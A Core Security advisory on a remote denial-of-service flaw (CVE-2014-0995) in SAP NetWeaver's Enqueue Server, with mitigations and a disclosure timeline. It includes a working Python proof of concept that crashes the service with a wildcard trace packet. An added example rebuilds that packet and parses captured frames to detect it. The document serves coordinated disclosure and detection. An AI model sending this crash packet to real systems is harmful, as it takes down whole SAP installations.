"SAP NetWeaver Enqueue Server - Denial of Service"

Author: Core Security
Platform: Windows
Release date: 2014-10-17

Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability

1. **Advisory Information**

Title: SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability
Advisory ID: CORE-2014-0007
Advisory URL: http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability
Date published: 2014-10-15
Date of last update: 2014-10-15
Vendors contacted: SAP
Release mode: Coordinated release

2. **Vulnerability Information**

Class: Uncontrolled Recursion [CWE-674]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0995

3. **Vulnerability Description**

        SAP Netweaver [1] is a technology platform for building and integrating SAP business
        applications. A vulnerability has been found in SAP Netweaver that could allow an
        unauthenticated, remote attacker to create denial of service conditions. The vulnerability
        is triggered by sending a specially crafted SAP Enqueue Server packet to remote TCP port 32NN
        (NN being the SAP system number) of a host running the "Standalone Enqueue Server" service, part
        of SAP Netweaver Application Server ABAP/Java. The "Standalone Enqueue Server" is a critical
        component of an SAP Netweaver installation in terms of availability: it holds the central lock
        table of the system, so crashing it renders the whole SAP system unresponsive.
    
4. **Vulnerable Packages**

   . SAP Netweaver 7.01 (enserver.exe version v7010.32.15.63503).
   . SAP Netweaver 7.20 (enserver.exe version v7200.70.18.23869).
  
    Other versions are probably affected too, but they were not checked.

5. **Vendor Information, Solutions and Workarounds**

        Martin Gallo proposed the following actions to mitigate the impact of the vulnerability:

        Restrict access to the Standalone Enqueue Server by configuring Access Control Lists [4] and by
        restricting network access to its TCP port 32NN (NN being the instance number).

        SAP published a security note [3] with the fix.
    
6. **Credits**

      This vulnerability was discovered and researched by Martin Gallo from Core Security Consulting
      Services. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core
      Advisories Team.
    
7. **Technical Description / Proof of Concept Code**

      When the trace level of the service is configured to stop logging when a pattern is found [2], the
      service does not properly limit the depth of recursion while matching the pattern, resulting in a
      stack overflow exception. The vulnerability can be triggered remotely, without authentication, by
      sending a "set trace level" administration packet that carries a wildcard Trace Pattern ("*").
      This allows a remote, unauthenticated attacker to conduct a denial of service attack against
      vulnerable systems, rendering the Enqueue Server unavailable.

      The following Python code can be used to trigger the vulnerability:
    
7.1. **Proof of Concept**

/-----
import argparse
import socket
import struct

# Parse the target options
parser = argparse.ArgumentParser(
    description="CORE-2014-0007: SAP Netweaver Enqueue Server trace pattern denial of service")
parser.add_argument("-d", "--hostname", default="localhost", help="Hostname")
parser.add_argument("-p", "--port", type=int, default=3200,
                    help="Port number (32NN, NN being the SAP system number)")
options = parser.parse_args()


def send_packet(sock, packet):
    # Prepend the 4-byte big-endian NI length header and send the whole frame
    sock.sendall(struct.pack("!I", len(packet)) + packet)


# Connect
print("[*] Connecting to", options.hostname, "port", options.port)
connection = socket.create_connection((options.hostname, options.port))

print("[*] Sending crash packet")

crash = b'\xab\xcd\xe1\x23'  # Magic bytes
crash += b'\x00\x00\x00\x00'  # Id
crash += b'\x00\x00\x00\x5b\x00\x00\x00\x5b'  # Packet/frag length (0x5b = 91 bytes, the whole packet)
crash += b'\x03\x00\x00\x00'  # Destination/Opcode/MoreFrags/Type
crash += b'ENC\x00'  # Admin Eye-catcher
crash += b'\x01\x00\x00\x00'  # Version
crash += b'#EAA'  # Admin Eye-catcher
crash += b'\x01\x00\x00\x00\x00'  # Len
crash += b'\x06\x00\x00\x00\x00\x00'  # Opcode/Flags/RC
crash += b'#EAE'  # Admin Eye-catcher
crash += b'\x01\x04\x00\x00'  # Version/Action/Limit/Thread
crash += b'\x00\x00\x00\x00'
crash += b'\x00\x00\x00\x03\x00\x00\x00\x03'  # Trace Level
crash += b'\x01'  # Logging
crash += b'\x01\x40\x00\x00'  # Max file size
crash += b'\x00\x00\x00\x01\x00\x00\x00\x01'  # No. patterns
crash += b'\x00\x00\x00\x25#EAH'  # Trace Eye-catcher
crash += b'\x01*\x00'  # Trace Pattern: the wildcard that triggers the recursion
crash += b'#EAD'  # Trace Eye-catcher

send_packet(connection, crash)
connection.close()
print("[*] Crash sent !")
-----/
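The following Python 3 code is an added example, not part of the Core Security advisory or its PoC. It reconstructs the framing of the trace request shown above so that the two sides of the problem described in section 7 can be exercised offline: build_trace_frame() produces the same packet for any trace pattern, recomputing the NI length prefix and the two packet length words (build_trace_frame("*") reproduces the advisory's 91-byte packet byte for byte), and parse_trace_frame() turns a frame captured on port 32NN back into the fields the PoC names, so a monitor can flag "set trace" requests carrying the "*" wildcard. Field names and offsets are taken from the PoC's comments; the bytes the advisory does not explain are kept as opaque constants, and the reading of the byte after #EAH as a single lead byte followed by a NUL-terminated pattern, the assumption that the opaque fields do not depend on the pattern length, and the function names are this example's own.

```python
import struct

# Framing of the Enqueue Server admin "set trace" request as laid out in the
# advisory PoC. Field names follow the PoC's comments; bytes whose meaning the
# advisory does not give are kept as opaque constants (assumption: they do not
# depend on the pattern length).
MAGIC = b"\xab\xcd\xe1\x23"
NI_HEADER = struct.Struct("!I")   # 4-byte big-endian length prefix added by send_packet()

# Fixed admin block between the two length words and the trace pattern.
ADMIN_PREFIX = (
    b"\x03\x00\x00\x00"                     # Destination/Opcode/MoreFrags/Type
    + b"ENC\x00"                            # Admin eye-catcher
    + b"\x01\x00\x00\x00"                   # Version
    + b"#EAA"                               # Admin eye-catcher
    + b"\x01\x00\x00\x00\x00"               # Len
    + b"\x06\x00\x00\x00\x00\x00"           # Opcode/Flags/RC
    + b"#EAE"                               # Admin eye-catcher
    + b"\x01\x04\x00\x00"                   # Version/Action/Limit/Thread
    + b"\x00\x00\x00\x00"
    + b"\x00\x00\x00\x03\x00\x00\x00\x03"   # Trace level
    + b"\x01"                               # Logging
    + b"\x01\x40\x00\x00"                   # Max file size
    + b"\x00\x00\x00\x01\x00\x00\x00\x01"   # No. patterns
    + b"\x00\x00\x00\x25#EAH"               # Trace eye-catcher
)
# magic + id + two length words (16 bytes), the fixed prefix, one lead byte
PATTERN_OFFSET = 16 + len(ADMIN_PREFIX) + 1


def build_trace_frame(pattern, packet_id=0):
    """Return the full NI frame (length prefix + packet) for a trace pattern.
    The NI prefix and both length words are recomputed from the body, so the
    framing stays consistent when the pattern is changed."""
    tail = ADMIN_PREFIX + b"\x01" + pattern.encode("ascii") + b"\x00" + b"#EAD"
    body_len = 4 + 4 + 8 + len(tail)
    body = MAGIC + struct.pack("!I", packet_id) + struct.pack("!II", body_len, body_len) + tail
    return NI_HEADER.pack(len(body)) + body


def parse_trace_frame(frame):
    """Parse one NI frame captured on port 32NN into the fields the PoC names.
    Raises ValueError on any framing inconsistency, so a monitor can tell a
    well-formed trace request from noise before trusting the fixed offsets."""
    if len(frame) < 4:
        raise ValueError("short NI header")
    (ni_len,) = NI_HEADER.unpack_from(frame, 0)
    body = frame[4:]
    if ni_len != len(body):
        raise ValueError("NI length %d != body length %d" % (ni_len, len(body)))
    if body[:4] != MAGIC:
        raise ValueError("bad magic %r" % body[:4])
    packet_id, pkt_len, frag_len = struct.unpack_from("!III", body, 4)
    if pkt_len != len(body) or frag_len != len(body):
        raise ValueError("length words %d/%d != body length %d" % (pkt_len, frag_len, len(body)))
    # Eye-catchers sit at fixed offsets in this layout
    for offset, marker in ((20, b"ENC\x00"), (28, b"#EAA"), (43, b"#EAE"), (80, b"#EAH")):
        if body[offset:offset + 4] != marker:
            raise ValueError("eye-catcher %r missing at offset %d" % (marker, offset))
    nul = body.find(b"\x00", PATTERN_OFFSET)
    if nul < 0 or body[nul + 1:] != b"#EAD":
        raise ValueError("trace pattern not NUL-terminated or #EAD trailer missing")
    return {
        "packet_id": packet_id,
        "admin_opcode": body[37],                        # first byte of Opcode/Flags/RC
        "trace_level": struct.unpack_from("!II", body, 55),
        "logging": body[63],
        "pattern_count": struct.unpack_from("!II", body, 68),
        "pattern": body[PATTERN_OFFSET:nul].decode("ascii", "replace"),
    }


def is_wildcard_trace_request(frame):
    """True when the frame is a well-formed trace request whose pattern
    contains the '*' wildcard the advisory uses as the trigger."""
    try:
        fields = parse_trace_frame(frame)
    except ValueError:
        return False
    return "*" in fields["pattern"]


if __name__ == "__main__":
    frame = build_trace_frame("*")
    print("frame length:", len(frame), "fields:", parse_trace_frame(frame))
    print("wildcard request:", is_wildcard_trace_request(frame))
```

The parser is deliberately strict: the NI prefix and both length words must agree with the actual frame size before any fixed offset is read, which is also the first sanity check a network sensor on port 32NN should apply. The code only builds and inspects bytes; sending the built frame to an unpatched Enqueue Server has the effect described in section 7.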

8. **Report Timeline**

. 2014-06-02:

        Initial notification sent to SAP, including technical description to reproduce the
        vulnerability. Publication date set to Jun 30, 2014.

. 2014-06-03:

        Vendor notifies that the tracking number 1153917-2014 was created for this issue.

. 2014-06-26:

        Core Security requests SAP to inform the status of the advisory.

. 2014-06-30:

        The vendor informs they were not able to reproduce the issue and they request additional
        details and a proof of concept.

. 2014-06-30:

        Core Security sends SAP a full description of the vulnerability including a python script
        to trigger it.

. 2014-07-11:

        Core Security asks if the vendor was able to trigger the vulnerability. Additionally we
        requested to set a publication date for the advisory based on the release of a fix.

. 2014-07-14:

        The vendor informs they were able to reproduce the issue but they will not be able to provide
        a timeline for the fix at the time. They inform they will work with high priority on it and
        will inform us of the planned fix release date.

. 2014-08-12:

        Core Security asks if the vendor was able to develop a fix and if they have a possible timeline
        for its availability.

. 2014-08-13:

        The vendor informs that the fix is undergoing quality checks. They also inform that they can't
        provide an exact date of publication yet. They also request a 3 months grace period once the
        patch is available.

. 2014-08-13:

        Core Security informs SAP that after we get notice that the fix is available to the public we will
        publish the advisory accordingly and will not wait for the 3 months of grace as requested because
        that's not our proceeding policy.

. 2014-08-18:

        The vendor informs that the fix is going to be released with the October patch day, on Tuesday,
        October 14, 2014.

. 2014-10-14:

        The vendor publishes the fix under the security note 2042845.

. 2014-10-15:

        Core Security releases the advisory.
      
9. **References**

[1] http://www.sap.com/platform/netweaver/index.epx
[2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/e929ca3d7001cee10000000a421937/content.htm?frameset=/en/47/ea3ef600e83b8be10000000a421937/frameset.htm
[3] SAP security note 2042845
[4] SAP security note 1495075, https://websmp230.sap-ag.de/sap/support/notes/1495075
    
10. **About CoreLabs**

        CoreLabs, the research center of Core Security, is charged with anticipating
        the future needs and requirements for information security technologies.
        We conduct our research in several important areas of computer security
        including system vulnerabilities, cyber attack planning and simulation,
        source code auditing, and cryptography. Our results include problem
        formalization, identification of vulnerabilities, novel solutions and
        prototypes for new technologies. CoreLabs regularly publishes security
        advisories, technical papers, project information and shared software
        tools for public use at: http://corelabs.coresecurity.com.
    
11. **About Core Security**

        Core Security enables organizations to get ahead of threats with security
        test and measurement solutions that continuously identify and demonstrate
        real-world exposures to their most critical assets. Our customers can
        gain real visibility into their security standing, real validation of
        their security controls, and real metrics to more effectively secure their
        organizations.

        Core Security's software solutions build on over a decade of trusted
        research and leading-edge threat expertise from the company's Security
        Consulting Services, CoreLabs and Engineering groups. Core Security
        can be reached at +1 (617) 399-6980 or on the Web at:
        http://www.coresecurity.com.
    
12. **Disclaimer**

        The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and
        are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
        License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. **PGP/GPG Keys**

        This advisory has been signed with the GPG key of Core Security advisories team, which is
        available for download at
        http://www.coresecurity.com/files/attachments/core_security_advisories.asc.